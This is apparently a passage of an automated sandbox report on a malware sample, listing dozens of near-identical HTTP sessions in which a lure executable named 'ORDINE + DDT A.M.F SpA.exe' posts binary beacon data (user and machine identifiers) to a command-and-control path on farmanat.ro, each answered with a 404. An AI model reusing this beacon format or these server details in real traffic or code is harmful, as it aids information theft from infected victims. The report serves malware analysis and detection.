                                              Nov 25, 2021 10:51:06.737952948 CET6798OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:06.772093058 CET6799OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:06.822905064 CET6799INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:05 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              346192.168.11.2050189176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:07.173147917 CET6800OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:07.206540108 CET6800OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:07.256402016 CET6800INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:06 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              347192.168.11.2050190176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:07.681215048 CET6801OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:07.714797020 CET6801OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:07.763802052 CET6802INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:06 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              348192.168.11.2050191176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:08.197546005 CET6802OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:08.231771946 CET6803OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:08.291446924 CET6803INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:07 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              349192.168.11.2050192176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:08.699100018 CET6804OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:08.733371973 CET6804OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:08.790093899 CET6804INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:07 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              35192.168.11.2049871176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:24.413482904 CET6359OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:24.446990013 CET6359OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:24.498095989 CET6360INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:23 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              350192.168.11.2050193176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:09.171001911 CET6805OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:09.204565048 CET6805OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:09.257839918 CET6806INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:08 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              351192.168.11.2050194176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:09.689188957 CET6806OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:09.723226070 CET6807OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:09.789699078 CET6807INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:08 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              352192.168.11.2050195176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:10.157748938 CET6808OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:10.191306114 CET6808OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:10.241446972 CET6808INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:09 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              353192.168.11.2050196176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:10.674041986 CET6809OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:10.708216906 CET6809OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:10.757982969 CET6810INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:09 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              354192.168.11.2050197176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:11.173858881 CET6810OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:11.208249092 CET6811OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:11.259363890 CET6811INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:10 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              355192.168.11.2050198176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:11.656342983 CET6812OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:11.689915895 CET6812OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:11.739130974 CET6812INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:10 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              356192.168.11.2050199176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:12.172382116 CET6813OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:12.206692934 CET6813OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:12.258594990 CET6814INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:11 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              357192.168.11.2050200176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:12.686144114 CET6814OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:12.720303059 CET6815OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:12.771950960 CET6815INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:11 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              358192.168.11.2050201176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:13.206222057 CET6816OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:13.239768028 CET6816OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:13.333662033 CET6816INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:12 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              359192.168.11.2050202176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:13.758898973 CET6817OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:13.792969942 CET6817OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:13.844526052 CET6818INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:12 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              36192.168.11.2049872176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:25.080255032 CET6360OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:25.114614964 CET6361OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:25.168153048 CET6361INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:24 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              360192.168.11.2050203176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:14.276834011 CET6818OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:14.310445070 CET6819OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:14.360156059 CET6819INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:13 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              361192.168.11.2050204176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:51:14.793078899 CET6820OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:51:14.826673031 CET6820OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:51:14.881376028 CET6820INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:51:13 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
